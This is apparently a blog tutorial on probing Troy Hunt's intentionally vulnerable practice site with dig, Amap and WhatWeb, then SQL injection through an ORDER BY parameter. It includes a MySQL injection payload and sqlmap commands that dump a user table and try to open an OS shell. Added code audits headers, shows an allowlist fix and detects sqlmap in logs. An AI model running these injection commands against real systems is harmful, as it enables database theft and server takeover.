Linuxer, ex IBMer. GNU https://hmchzb19.github.io/

Category: Networking and Security

2017-11-20 15:57:54

This site contains many OWASP Top 10 flaws, so we can practise on it to sharpen our skills.

1. Start with Amap. Amap is an application-mapping scanner that can detect the version of the web application listening behind a port.

    https://tools.kali.org/information-gathering/amap

First, find the IP address of hackyourselffirst.troyhunt.com.

    dig @8.8.8.8 hackyourselffirst.troyhunt.com A

    ; <<>> DiG 9.10.3-P4-Debian <<>> @8.8.8.8 hackyourselffirst.troyhunt.com A
    ; (1 server found)
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6927
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1

    ;; OPT PSEUDOSECTION:
    ; EDNS: version: 0, flags:; udp: 512
    ;; QUESTION SECTION:
    ;hackyourselffirst.troyhunt.com.    IN    A

    ;; ANSWER SECTION:
    hackyourselffirst.troyhunt.com.    286 IN    CNAME    hackyourselffirst.azurewebsites.net.
    hackyourselffirst.azurewebsites.net. 3586 IN CNAME waws-prod-bay-003.vip.azurewebsites.windows.net.
    waws-prod-bay-003.vip.azurewebsites.windows.net. 286 IN    CNAME waws-prod-bay-003.cloudapp.net.
    waws-prod-bay-003.cloudapp.net.    46 IN    A    137.117.17.70

    ;; Query time: 52 msec
    ;; SERVER: 8.8.8.8#53(8.8.8.8)
    ;; WHEN: Mon Nov 20 14:59:53 CST 2017
    ;; MSG SIZE  rcvd: 223

The IP address is 137.117.17.70, and we can also see that hackyourselffirst.troyhunt.com sits behind a chain of aliases (CNAME records).
Next, use Amap to probe the web application behind it.

    amap -bqv 137.117.17.70 80
    Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
    Using response file /etc/amap/appdefs.resp ... loaded 346 responses
    Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers

    amap v5.4 (www.thc.org/thc-amap) started at 2017-11-20 15:02:35 - APPLICATION MAPPING mode

    Total amount of tasks to perform in plain connect mode: 23
    Waiting for timeout on 23 connections ...
    Protocol on 137.117.17.70:80/tcp matches http - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>Microsoft Azure Web App - Error 404</titl
    Protocol on 137.117.17.70:80/tcp matches http-iis - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>Microsoft Azure Web App - Error 404</titl
    Protocol on 137.117.17.70:80/tcp matches http-apache-2 - banner: HTTP/1.1 400 Bad Request\r\nContent-Type text/html; charset=us-ascii\r\nServer Microsoft-HTTPAPI/2.0\r\nDate Mon, 20 Nov 2017 070234 GMT\r\nConnection close\r\nContent-Length 326\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"

The result is inconclusive: the site could be running IIS or Apache. Amap matched both IIS and Apache signatures, even though every banner it printed carries a Microsoft server string.
Since Amap's result is unsatisfying, let's try the WhatWeb scanner next.


2. WhatWeb's website: https://www.morningstarsecurity.com/research/whatweb
WhatWeb's command line offers far more options.

    Usage: whatweb [options] <URLs>

    TARGET SELECTION:
      <TARGETs>            Enter URLs, hostnames, IP adddresses, or
                      nmap-format IP ranges.
      --input-file=FILE, -i        Read targets from a file.

    AGGRESSION:
      --aggression, -a=LEVEL    Set the aggression level. Default: 1.
      1. Stealthy            Makes one HTTP request per target and also
                      follows redirects.
      3. Aggressive            If a level 1 plugin is matched, additional
                      requests will be made.

    PLUGINS:
      --list-plugins, -l        List all plugins.
      --info-plugins, -I=[SEARCH]    List all plugins with detailed information.
                    Optionally search with a keyword.
      --search-plugins=STRING    Search plugins for a keyword.
      --grep, -g=STRING        Search for STRING in HTTP responses. Reports
                    with a plugin named Grep.
    OUTPUT:
      --verbose, -v            Verbose output includes plugin descriptions.
                    Use twice for debugging.
      --colour,--color=WHEN        control whether colour is used. WHEN may be
                    `never', `always', or `auto'.

    HELP & MISCELLANEOUS:
      --short-help            This short usage help.
      --help, -h            Complete usage help.

    EXAMPLE USAGE:
    * Scan example.com.
      ./whatweb example.com
    * Scan reddit.com slashdot.org with verbose plugin descriptions.
      ./whatweb -v reddit.com slashdot.org
    * An aggressive scan of wired.com detects the exact version of WordPress.
      ./whatweb -a 3 www.wired.com
    * Scan the local network quickly and suppress errors.
      whatweb --no-errors 192.168.0.0/24
    * Scan the local network for HTTPS websites.
      whatweb --no-errors --url-prefix https:// 192.168.0.0/24
    * Scan for crossdomain policies in the Alexa Top 1000.
      ./whatweb -i plugin-development/alexa-top-100.txt \
      --url-suffix /crossdomain.xml -p crossdomain_xml

      Note: This is the short usage help.
      For the complete usage help use -h or --help.
Probing with WhatWeb yields far more information.

    whatweb -v hackyourselffirst.troyhunt.com
    WhatWeb report for http://hackyourselffirst.troyhunt.com
    Status : 200 OK
    Title : Supercar Showdown - Supercar Showdown
    IP : 137.117.17.70
    Country : UNITED STATES, US

    Summary : JQuery, ASP_NET[4.0.30319][MVC5.1], HttpOnly[ARRAffinity,ASP.NET_SessionId], Cookies[ARRAffinity,ASP.NET_SessionId,VisitStart], UncommonHeaders[x-aspnetmvc-version], HTML5, X-Powered-By[ASP.NET], X-XSS-Protection[0], Microsoft-IIS[8.0], Script[text/javascript], HTTPServer[Microsoft-IIS/8.0], Google-Analytics[Universal][UA-43629727-1]

    Detected Plugins:
    [ ASP_NET ]
        ASP.NET is a free web framework that enables great Web
        applications. Used by millions of developers, it runs some
        of the biggest sites in the world.

        Version : 4.0.30319 (from X-AspNet-Version HTTP header)
        String : MVC5.1
        Google Dorks: (2)
        Website : http://www.asp.net/

    [ Cookies ]
        Display the names of cookies in the HTTP headers. The
        values are not returned to save on space.

        String : ASP.NET_SessionId
        String : VisitStart
        String : ARRAffinity

    [ Google-Analytics ]
        This plugin identifies the Google Analytics account.

        Version : Universal
        Account : UA-43629727-1
        Website : http://www.google.com/analytics/

    [ HTML5 ]
        HTML version 5, detected by the doctype declaration

    [ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        String : Microsoft-IIS/8.0 (from server string)

    [ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie
        response header and the browser supports it then the cookie
        cannot be accessed through client side script - More Info:
        http://en.wikipedia.org/wiki/HTTP_cookie

        String : ARRAffinity,ASP.NET_SessionId

    [ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse
        HTML documents, handle events, perform animations, and add
        AJAX.

        Website : http://jquery.com/

    [ Microsoft-IIS ]
        Microsoft Internet Information Services (IIS) for Windows
        Server is a flexible, secure and easy-to-manage Web server
        for hosting anything on the Web. From media streaming to
        web application hosting, IIS's scalable and open
        architecture is ready to handle the most demanding tasks.

        Version : 8.0
        Website : http://www.iis.net/

    [ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.

        String : text/javascript

    [ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all
        the standard headers and many non standard but common ones.
        Interesting but fairly common headers should have their own
        plugins, eg. x-powered-by, server and x-aspnet-version.
        Info about headers can be found at www.http-stats.com

        String : x-aspnetmvc-version (from headers)

    [ X-Powered-By ]
        X-Powered-By HTTP header

        String : ASP.NET (from x-powered-by string)

    [ X-XSS-Protection ]
        This plugin retrieves the X-XSS-Protection value from the
        HTTP header. - More Info:
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String : 0

    HTTP Headers:
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 3276
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/8.0
        Set-Cookie: ASP.NET_SessionId=1ifarra5yyutpekgrkxcmcab; path=/; HttpOnly
        Set-Cookie: VisitStart=11/20/2017 7:53:15 AM; path=/
        X-XSS-Protection: 0
        X-AspNetMvc-Version: 5.1
        X-AspNet-Version: 4.0.30319
        X-Powered-By: ASP.NET
        Set-Cookie: ARRAffinity=a58b2af319235c59b570f5ff28442356c3b989ad5027b21b3d5cc5b39074afda;Path=/;HttpOnly;Domain=hackyourselffirst.troyhunt.com
        Date: Mon, 20 Nov 2017 07:53:11 GMT
        Connection: close
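Read from the defender's side, the same header block tells you what to tighten: every version header WhatWeb fingerprinted, the cookie that lacks HttpOnly, and the disabled XSS filter. The following is an added example (my code, not WhatWeb's) that audits the headers shown above; RAW_HEADERS is copied from the report, the checks are mine.

```python
# Added example, not from the original post: audit the response headers WhatWeb
# printed for version disclosure and weak cookie flags. RAW_HEADERS is copied
# from the WhatWeb report on this page; the checks themselves are my own.
RAW_HEADERS = """\
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3276
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
Set-Cookie: ASP.NET_SessionId=1ifarra5yyutpekgrkxcmcab; path=/; HttpOnly
Set-Cookie: VisitStart=11/20/2017 7:53:15 AM; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: ARRAffinity=a58b2af319235c59b570f5ff28442356c3b989ad5027b21b3d5cc5b39074afda;Path=/;HttpOnly;Domain=hackyourselffirst.troyhunt.com
Date: Mon, 20 Nov 2017 07:53:11 GMT
Connection: close
"""
# Headers whose values let a scanner fingerprint the server and framework version.
VERSION_HEADERS = {"server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version"}

def parse_headers(raw: str) -> list:
    """Split a raw response into (name, value) pairs, skipping the status line."""
    pairs = []
    for line in raw.splitlines()[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs

def audit_headers(raw: str) -> dict:
    """Report version-disclosing headers, cookies lacking HttpOnly/Secure, and a disabled XSS filter."""
    findings = {"disclosure": [], "cookies": {}, "xss_filter_disabled": False}
    for name, value in parse_headers(raw):
        lname = name.lower()
        if lname in VERSION_HEADERS:
            findings["disclosure"].append(f"{name}: {value}")
        elif lname == "set-cookie":
            parts = [p.strip() for p in value.split(";")]
            cookie_name = parts[0].split("=", 1)[0]
            attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
            findings["cookies"][cookie_name] = [f for f in ("HttpOnly", "Secure") if f.lower() not in attrs]
        elif lname == "x-xss-protection" and value.startswith("0"):
            findings["xss_filter_disabled"] = True
    return findings
```

For this site the audit flags four version headers, a VisitStart cookie with no HttpOnly flag, and no Secure flag on any cookie (the report was fetched over plain http).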

3. Use sqlmap for SQL injection.
URL:
Because the injectable parameter here is an ORDER BY clause, the payload has to be an ORDER BY expression. Unfortunately I do not know the SQL Server ORDER BY tricks, so I can only rely on sqlmap; if the backend were MySQL, a statement like the following could be used.

    select id from news where id=1 order by 1,(select case when(1=2) then 1 else 1* (select table_name from information_schema.tables)end)=1;
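From the defender's side, the reason an orderby parameter is exploitable at all is that a sort column is part of the SQL text and cannot be passed as a bound parameter; the fix is an allowlist that maps the user's value onto a fixed column name. The following is an added example (my code, not the site's); the Supercar table, its columns and its rows are assumed to mirror the /Make/1?orderby=supercarid page.

```python
# Added example, not from the original post: the orderby value cannot be sent as a
# bound parameter (ORDER BY takes a column name, not a value), so the only safe
# option is an allowlist. Table name, columns and rows are constructed to mirror
# the /Make/1?orderby=supercarid page; the real schema is unknown.
import sqlite3

ALLOWED_SORT_COLUMNS = {"supercarid": "SupercarId", "name": "Name", "topspeed": "TopSpeed"}
BASE_SQL = "SELECT SupercarId, Name, TopSpeed FROM Supercar WHERE MakeId = ? ORDER BY "

def query_unsafe(orderby: str) -> str:
    # Vulnerable pattern: whatever arrives in ?orderby= is pasted into the SQL text,
    # which is exactly what let sqlmap drive the database through this parameter.
    return BASE_SQL + orderby

def query_safe(orderby: str) -> str:
    # Hardened pattern: map the user value onto a fixed column name; anything not in
    # the map is rejected before any SQL is assembled. MakeId stays a bound parameter.
    column = ALLOWED_SORT_COLUMNS.get(orderby.lower())
    if column is None:
        raise ValueError(f"unknown sort column: {orderby!r}")
    return BASE_SQL + column

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Supercar (SupercarId INTEGER, MakeId INTEGER, Name TEXT, TopSpeed INTEGER)")
    conn.executemany("INSERT INTO Supercar VALUES (?, ?, ?, ?)",
                     [(3, 1, "Veyron", 407), (1, 1, "Chiron", 420), (2, 2, "Huayra", 383)])
    return conn

def list_supercars(make_id: int, orderby: str) -> list:
    """Names of make_id's cars in the requested order, via the hardened query."""
    with make_db() as conn:
        return [row[1] for row in conn.execute(query_safe(orderby), (make_id,))]

# Constructed value that no legitimate sort link would ever send.
TAMPERED = "supercarid, (SELECT 1)"

def is_rejected(orderby: str) -> bool:
    """True when the hardened builder refuses the value; the unsafe one never does."""
    try:
        query_safe(orderby)
    except ValueError:
        return True
    return False
```

The unsafe builder returns TAMPERED verbatim inside the statement, while the hardened one raises before any SQL reaches the database.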
sqlmap is a very powerful weapon. In my experiments, all of the following worked; the last one, which dumps the data, takes around four or five minutes.

    sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dbs
    sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-user
    sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-db
    sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --tables -D 'hackyourselffirst_db'
    sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --columns -T UserProfile -D 'hackyourselffirst_db'
    sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dump -T UserProfile -D 'hackyourselffirst_db'
Only the --os-shell command did not succeed.

    sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --os-shell
Still, I am quite satisfied. sqlmap is a very powerful automated SQL injection tool; no single person can be expected to master every SQL clause that can be exploited, and that is where sqlmap plays a key role.
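A run like the one above leaves a clear trail in the web server log: sqlmap's default User-Agent names itself, and the orderby parameter receives values that are not column identifiers. The following is an added example (my detection logic, not part of sqlmap or of the original post); SAMPLE_LOG is a constructed IIS W3C log with documentation-range addresses and a made-up sqlmap version, and its field list is a subset of the IIS defaults.

```python
# Added example, not from the original post: spot sqlmap-style probing of the
# orderby parameter in an IIS W3C log. SAMPLE_LOG is constructed (addresses from
# the documentation ranges, a made-up sqlmap version); the field list is a subset
# of the IIS defaults, and "+" stands for spaces inside cs(User-Agent) as IIS logs it.
import re
from urllib.parse import parse_qs

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2017-11-20 07:53:11 GET /Make/1 orderby=supercarid 198.51.100.10 Mozilla/5.0+(X11;+Linux+x86_64) 200
2017-11-20 08:02:15 GET /Make/1 orderby=supercarid 198.51.100.23 sqlmap/1.1.11#stable+(http://sqlmap.org) 200
2017-11-20 08:02:16 GET /Make/1 orderby=supercarid%27 198.51.100.23 sqlmap/1.1.11#stable+(http://sqlmap.org) 500
2017-11-20 08:02:17 GET /Make/1 orderby=(select%201) 198.51.100.23 Mozilla/5.0+(Windows+NT+10.0) 500
2017-11-20 08:05:40 GET /Make/2 orderby=name 203.0.113.7 Mozilla/5.0+(Macintosh) 200
"""

# A legitimate sort key is a bare column identifier; anything else is tampering.
SORT_COLUMN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

def parse_w3c(text: str) -> list:
    """Turn W3C extended log lines into dicts keyed by the names in #Fields."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def classify(row: dict) -> list:
    """Reasons this request looks like SQL injection probing (empty list if none)."""
    reasons = []
    if "sqlmap" in row["cs(User-Agent)"].lower():
        reasons.append("sqlmap user-agent")
    for value in parse_qs(row["cs-uri-query"]).get("orderby", []):
        if not SORT_COLUMN.match(value):
            reasons.append(f"non-identifier orderby value {value!r}")
    return reasons

def suspicious_clients(text: str) -> dict:
    """Map client IP -> list of reasons, for clients with at least one hit."""
    hits = {}
    for row in parse_w3c(text):
        for reason in classify(row):
            hits.setdefault(row["c-ip"], []).append(reason)
    return hits
```

The User-Agent check is the weaker of the two, since a client can send any string it likes; the parameter check catches the probing even when the agent string looks like a browser.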
